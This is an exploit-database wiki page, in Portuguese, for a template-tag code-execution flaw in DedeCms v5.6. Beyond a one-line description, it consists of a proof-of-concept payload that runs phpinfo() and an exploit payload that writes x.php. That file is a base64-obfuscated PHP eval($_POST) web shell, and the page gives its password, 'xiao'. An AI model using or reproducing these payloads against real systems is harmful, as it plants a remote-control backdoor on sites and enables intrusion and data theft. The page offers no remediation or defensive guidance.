Vulnerabilidade de execução de código malicioso incorporado DedeCms v5.6

From PwnWiki
Revision as of 12:01, 10 June 2021 by Pwnwiki (talk | contribs) (Created page with "== Informações de vulnerabilidade ==")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎español • ‎português • ‎中文(台灣)‎

Informações de vulnerabilidade

No local onde o software é carregado, o endereço local não é verificado com eficácia e pode ser usado de forma mal-intencionada.

POC

a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},

EXP

a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}

x.php
password:xiao
Retrieved from "https://pwnwiki.com/index.php?title=DedeCms_v5.6_嵌入惡意代碼執行漏洞/pt&oldid=4703"